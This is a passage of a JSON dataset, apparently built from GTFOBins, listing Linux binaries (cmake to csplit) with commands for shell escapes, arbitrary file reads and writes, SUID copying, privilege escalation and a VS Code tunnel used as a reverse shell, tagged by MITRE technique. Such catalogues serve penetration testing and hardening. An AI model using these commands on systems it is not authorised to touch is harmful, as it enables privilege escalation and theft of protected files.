\"/bin/sh\")(ext:exit)'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/clisp/"]},{"id":"gtfo:cmake:file-read:0:sudo","toolId":"gtfo:cmake","toolName":"cmake","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cmake -E cat /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cmake/"]},{"id":"gtfo:cmake:file-read:0:unprivileged","toolId":"gtfo:cmake","toolName":"cmake","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"cmake -E cat /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cmake/"]},{"id":"gtfo:cmake:shell:0:sudo","toolId":"gtfo:cmake","toolName":"cmake","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'execute_process(COMMAND /bin/sh)' >/path/to/CMakeLists.txt\ncmake /path/to/","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cmake/"]},{"id":"gtfo:cmake:shell:0:unprivileged","toolId":"gtfo:cmake","toolName":"cmake","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'execute_process(COMMAND /bin/sh)' >/path/to/CMakeLists.txt\ncmake /path/to/","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cmake/"]},{"id":"gtfo:cmp:file-read:0:sudo","toolId":"gtfo:cmp","toolName":"cmp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cmp /path/to/input-file /dev/zero -b -l","description":"Dump the bytes of the input file that are different from the NUL byte in a tabular format.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cmp/"]},{"id":"gtfo:cmp:file-read:0:suid","toolId":"gtfo:cmp","toolName":"cmp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cmp /path/to/input-file /dev/zero -b -l","description":"Dump the bytes of the input file that are different from the NUL byte in a tabular format.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cmp/"]},{"id":"gtfo:cmp:file-read:0:unprivileged","toolId":"gtfo:cmp","toolName":"cmp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"cmp /path/to/input-file /dev/zero -b -l","description":"Dump the bytes of the input file that are different from the NUL byte in a tabular format.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cmp/"]},{"id":"gtfo:cobc:shell:0:sudo","toolId":"gtfo:cobc","toolName":"cobc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'CALL \"SYSTEM\" USING \"/bin/sh\".' >/path/to/temp-file\ncobc -xFj --frelax-syntax-checks /path/to/temp-file","description":"The `/path/to/temp-file` sill be overwritten after the execution.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cobc/"]},{"id":"gtfo:cobc:shell:0:suid","toolId":"gtfo:cobc","toolName":"cobc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'CALL \"SYSTEM\" USING \"/bin/sh\".' >/path/to/temp-file\ncobc -xFj --frelax-syntax-checks /path/to/temp-file","description":"The `/path/to/temp-file` sill be overwritten after the execution.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cobc/"]},{"id":"gtfo:cobc:shell:0:unprivileged","toolId":"gtfo:cobc","toolName":"cobc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'CALL \"SYSTEM\" USING \"/bin/sh\".' >/path/to/temp-file\ncobc -xFj --frelax-syntax-checks /path/to/temp-file","description":"The `/path/to/temp-file` sill be overwritten after the execution.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cobc/"]},{"id":"gtfo:code:download:0:sudo","toolId":"gtfo:code","toolName":"code","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"code tunnel --name xxxxxx","description":"This requires a valid GitHub account.\n\nRun the command locally, then on the attacker box navigate to <https://github.com/login/device>, using the provided code to authorize the tunnel.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/code/"]},{"id":"gtfo:code:download:0:unprivileged","toolId":"gtfo:code","toolName":"code","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"code tunnel --name xxxxxx","description":"This requires a valid GitHub account.\n\nRun the command locally, then on the attacker box navigate to <https://github.com/login/device>, using the provided code to authorize the tunnel.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/code/"]},{"id":"gtfo:code:reverse-shell:0:sudo","toolId":"gtfo:code","toolName":"code","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"code tunnel --name xxxxxx","description":"This requires a valid GitHub account.\n\nRun the command locally, then on the attacker box navigate to <https://github.com/login/device>, using the provided code to authorize the tunnel.","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/code/"]},{"id":"gtfo:code:reverse-shell:0:unprivileged","toolId":"gtfo:code","toolName":"code","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"code tunnel --name xxxxxx","description":"This requires a valid GitHub account.\n\nRun the command locally, then on the attacker box navigate to <https://github.com/login/device>, using the provided code to authorize the tunnel.","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/code/"]},{"id":"gtfo:code:upload:0:sudo","toolId":"gtfo:code","toolName":"code","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"code tunnel --name xxxxxx","description":"This requires a valid GitHub account.\n\nRun the command locally, then on the attacker box navigate to <https://github.com/login/device>, using the provided code to authorize the tunnel.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/code/"]},{"id":"gtfo:code:upload:0:unprivileged","toolId":"gtfo:code","toolName":"code","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"code tunnel --name xxxxxx","description":"This requires a valid GitHub account.\n\nRun the command locally, then on the attacker box navigate to <https://github.com/login/device>, using the provided code to authorize the tunnel.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/code/"]},{"id":"gtfo:codex:shell:0:sudo","toolId":"gtfo:codex","toolName":"codex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"codex sandbox linux /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/codex/"]},{"id":"gtfo:codex:shell:0:unprivileged","toolId":"gtfo:codex","toolName":"codex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"codex sandbox linux /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/codex/"]},{"id":"gtfo:column:file-read:0:sudo","toolId":"gtfo:column","toolName":"column","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"column /path/to/input-file","description":"This program expects textual data.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/column/"]},{"id":"gtfo:column:file-read:0:suid","toolId":"gtfo:column","toolName":"column","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"column /path/to/input-file","description":"This program expects textual data.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/column/"]},{"id":"gtfo:column:file-read:0:unprivileged","toolId":"gtfo:column","toolName":"column","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"column /path/to/input-file","description":"This program expects textual data.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/column/"]},{"id":"gtfo:comm:file-read:0:sudo","toolId":"gtfo:comm","toolName":"comm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"comm /path/to/input-file /dev/null","description":"A newline is appended to the file.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/comm/"]},{"id":"gtfo:comm:file-read:0:suid","toolId":"gtfo:comm","toolName":"comm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"comm /path/to/input-file /dev/null","description":"A newline is appended to the file.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/comm/"]},{"id":"gtfo:comm:file-read:0:unprivileged","toolId":"gtfo:comm","toolName":"comm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"comm /path/to/input-file /dev/null","description":"A newline is appended to the file.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/comm/"]},{"id":"gtfo:composer:shell:0:sudo","toolId":"gtfo:composer","toolName":"composer","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '{\"scripts\":{\"x\":\"/bin/sh\"}}' >composer.json\ncomposer run-script x","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/composer/"]},{"id":"gtfo:composer:shell:0:unprivileged","toolId":"gtfo:composer","toolName":"composer","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '{\"scripts\":{\"x\":\"/bin/sh\"}}' >composer.json\ncomposer run-script x","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/composer/"]},{"id":"gtfo:cowsay:inherit:0:sudo","toolId":"gtfo:cowsay","toolName":"cowsay","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:perl"],"command":"cowsay -f /path/to/script.pl x","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cowsay/"]},{"id":"gtfo:cowsay:inherit:0:unprivileged","toolId":"gtfo:cowsay","toolName":"cowsay","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:perl"],"command":"cowsay -f /path/to/script.pl x","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cowsay/"]},{"id":"gtfo:cowthink:inherit:0:sudo","toolId":"gtfo:cowthink","toolName":"cowthink","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:perl"],"command":"cowthink -f /path/to/script.pl x","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cowthink/"]},{"id":"gtfo:cowthink:inherit:0:unprivileged","toolId":"gtfo:cowthink","toolName":"cowthink","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:perl"],"command":"cowthink -f /path/to/script.pl x","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cowthink/"]},{"id":"gtfo:cp:file-read:0:sudo","toolId":"gtfo:cp","toolName":"cp","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cp /path/to/input-file /dev/stdout","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cp/"]},{"id":"gtfo:cp:file-read:0:suid","toolId":"gtfo:cp","toolName":"cp","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cp /path/to/input-file /dev/stdout","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cp/"]},{"id":"gtfo:cp:file-read:0:unprivileged","toolId":"gtfo:cp","toolName":"cp","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"cp /path/to/input-file /dev/stdout","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cp/"]},{"id":"gtfo:cp:file-write:0:sudo","toolId":"gtfo:cp","toolName":"cp","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | cp /dev/stdin /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cp/"]},{"id":"gtfo:cp:file-write:0:suid","toolId":"gtfo:cp","toolName":"cp","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | cp /dev/stdin /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cp/"]},{"id":"gtfo:cp:file-write:0:unprivileged","toolId":"gtfo:cp","toolName":"cp","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | cp /dev/stdin /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cp/"]},{"id":"gtfo:cp:privilege-escalation:0:sudo","toolId":"gtfo:cp","toolName":"cp","name":"privilege-escalation","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"cp /path/to/input-file /path/to/output-file","description":"This can be used to copy and then read or write files from a restricted file systems or with elevated privileges. (The GNU version of `cp` has the `--parents` option that can be used to also create the directory hierarchy specified in the source path, to the destination folder.)","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cp/"]},{"id":"gtfo:cp:privilege-escalation:0:suid","toolId":"gtfo:cp","toolName":"cp","name":"privilege-escalation","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"cp /path/to/input-file /path/to/output-file","description":"This can be used to copy and then read or write files from a restricted file systems or with elevated privileges. (The GNU version of `cp` has the `--parents` option that can be used to also create the directory hierarchy specified in the source path, to the destination folder.)","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cp/"]},{"id":"gtfo:cp:privilege-escalation:1:sudo","toolId":"gtfo:cp","toolName":"cp","name":"privilege-escalation","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"cp --attributes-only --preserve=all /path/to/input-file /path/to/output-file","description":"This can copy SUID permissions from any SUID binary (e.g., `/path/to/input-file`) to another.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cp/"]},{"id":"gtfo:cp:privilege-escalation:1:suid","toolId":"gtfo:cp","toolName":"cp","name":"privilege-escalation","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"cp --attributes-only --preserve=all /path/to/input-file /path/to/output-file","description":"This can copy SUID permissions from any SUID binary (e.g., `/path/to/input-file`) to another.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cp/"]},{"id":"gtfo:cpan:inherit:0:sudo","toolId":"gtfo:cpan","toolName":"cpan","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:perl"],"command":"cpan\n! ...","description":"Perl code can be executed with the `!` command.","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cpan/"]},{"id":"gtfo:cpan:inherit:0:unprivileged","toolId":"gtfo:cpan","toolName":"cpan","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:perl"],"command":"cpan\n! ...","description":"Perl code can be executed with the `!` command.","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cpan/"]},{"id":"gtfo:cpio:file-read:0:sudo","toolId":"gtfo:cpio","toolName":"cpio","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"echo /path/to/input-file | cpio -o","description":"The content of the file is printed to standard output, between the `cpio` archive format header and footer.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cpio/"]},{"id":"gtfo:cpio:file-read:0:suid","toolId":"gtfo:cpio","toolName":"cpio","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"echo /path/to/input-file | cpio -o","description":"The content of the file is printed to standard output, between the `cpio` archive format header and footer.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cpio/"]},{"id":"gtfo:cpio:file-read:0:unprivileged","toolId":"gtfo:cpio","toolName":"cpio","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"echo /path/to/input-file | cpio -o","description":"The content of the file is printed to standard output, between the `cpio` archive format header and footer.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cpio/"]},{"id":"gtfo:cpio:file-read:1:sudo","toolId":"gtfo:cpio","toolName":"cpio","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"echo /path/to/input-file | cpio -R $UID -dp .\ncat path/to/input-file","description":"The whole directory structure is copied to `.`, hence this is also a file write.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cpio/"]},{"id":"gtfo:cpio:file-read:1:suid","toolId":"gtfo:cpio","toolName":"cpio","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"echo /path/to/input-file | cpio -R $UID -dp .\ncat path/to/input-file","description":"The whole directory structure is copied to `.`, hence this is also a file write.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cpio/"]},{"id":"gtfo:cpio:file-read:1:unprivileged","toolId":"gtfo:cpio","toolName":"cpio","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"echo /path/to/input-file | cpio -dp .\ncat path/to/input-file","description":"The whole directory structure is copied to `.`, hence this is also a file write.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cpio/"]},{"id":"gtfo:cpio:file-write:0:sudo","toolId":"gtfo:cpio","toolName":"cpio","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\necho /path/to/temp-file | cpio -R 0:0 -udp .","description":"The whole directory structure is copied to `.`, with the data written to `./path/to/temp-file`.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cpio/"]},{"id":"gtfo:cpio:file-write:0:suid","toolId":"gtfo:cpio","toolName":"cpio","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\necho /path/to/temp-file | cpio -R 0:0 -udp .","description":"The whole directory structure is copied to `.`, with the data written to `./path/to/temp-file`.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cpio/"]},{"id":"gtfo:cpio:file-write:0:unprivileged","toolId":"gtfo:cpio","toolName":"cpio","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\necho /path/to/temp-file | cpio -udp .","description":"The whole directory structure is copied to `.`, with the data written to `./path/to/temp-file`.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cpio/"]},{"id":"gtfo:cpio:shell:0:sudo","toolId":"gtfo:cpio","toolName":"cpio","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '/bin/sh </dev/tty >/dev/tty' >localhost\ncpio -o --rsh-command /bin/sh -F localhost:","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cpio/"]},{"id":"gtfo:cpulimit:shell:0:sudo","toolId":"gtfo:cpulimit","toolName":"cpulimit","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cpulimit -l 100 -f -- /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cpulimit/"]},{"id":"gtfo:cpulimit:shell:0:suid","toolId":"gtfo:cpulimit","toolName":"cpulimit","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cpulimit -l 100 -f -- /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cpulimit/"]},{"id":"gtfo:cpulimit:shell:0:unprivileged","toolId":"gtfo:cpulimit","toolName":"cpulimit","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"cpulimit -l 100 -f -- /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cpulimit/"]},{"id":"gtfo:crash:command:0:sudo","toolId":"gtfo:crash","toolName":"crash","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"CRASHPAGER=/path/to/command crash -h","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/crash/"]},{"id":"gtfo:crash:command:0:unprivileged","toolId":"gtfo:crash","toolName":"crash","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"CRASHPAGER=/path/to/command crash -h","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/crash/"]},{"id":"gtfo:crash:inherit:0:sudo","toolId":"gtfo:crash","toolName":"crash","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"crash -h","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/crash/"]},{"id":"gtfo:crash:inherit:0:suid","toolId":"gtfo:crash","toolName":"crash","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"crash -h","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/crash/"]},{"id":"gtfo:crash:inherit:0:unprivileged","toolId":"gtfo:crash","toolName":"crash","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"crash -h","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/crash/"]},{"id":"gtfo:crontab:command:0:sudo","toolId":"gtfo:crontab","toolName":"crontab","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"crontab -e","description":"This spaws the default editor to edit the crontab file, commands can be scheduled to run using the [cron syntax](https://en.wikipedia.org/wiki/Cron).","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/crontab/"]},{"id":"gtfo:crontab:command:0:unprivileged","toolId":"gtfo:crontab","toolName":"crontab","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"crontab -e","description":"This spaws the default editor to edit the crontab file, commands can be scheduled to run using the [cron syntax](https://en.wikipedia.org/wiki/Cron).","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/crontab/"]},{"id":"gtfo:crontab:inherit:0:sudo","toolId":"gtfo:crontab","toolName":"crontab","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"crontab -e","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/crontab/"]},{"id":"gtfo:crontab:inherit:0:unprivileged","toolId":"gtfo:crontab","toolName":"crontab","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution"],"nativeCategory":["inherit","from:vi"],"command":"crontab -e","mitre":["T1005","T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/crontab/"]},{"id":"gtfo:csh:file-write:0:sudo","toolId":"gtfo:csh","toolName":"csh","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"csh -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/csh/"]},{"id":"gtfo:csh:file-write:0:suid","toolId":"gtfo:csh","toolName":"csh","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"csh -c 'echo DATA >/path/to/output-file' -b","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/csh/"]},{"id":"gtfo:csh:file-write:0:unprivileged","toolId":"gtfo:csh","toolName":"csh","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"csh -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/csh/"]},{"id":"gtfo:csh:shell:0:sudo","toolId":"gtfo:csh","toolName":"csh","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"csh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/csh/"]},{"id":"gtfo:csh:shell:0:suid","toolId":"gtfo:csh","toolName":"csh","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"csh -b","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/csh/"]},{"id":"gtfo:csh:shell:0:unprivileged","toolId":"gtfo:csh","toolName":"csh","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"csh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/csh/"]},{"id":"gtfo:csplit:file-read:0:sudo","toolId":"gtfo:csplit","toolName":"csplit","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"csplit /path/to/input-file 1\ncat xx01","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/csplit/"]},{"id":"gtfo:csplit:file-read:0:suid","toolId":"gtfo:csplit","toolName":"csplit","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege 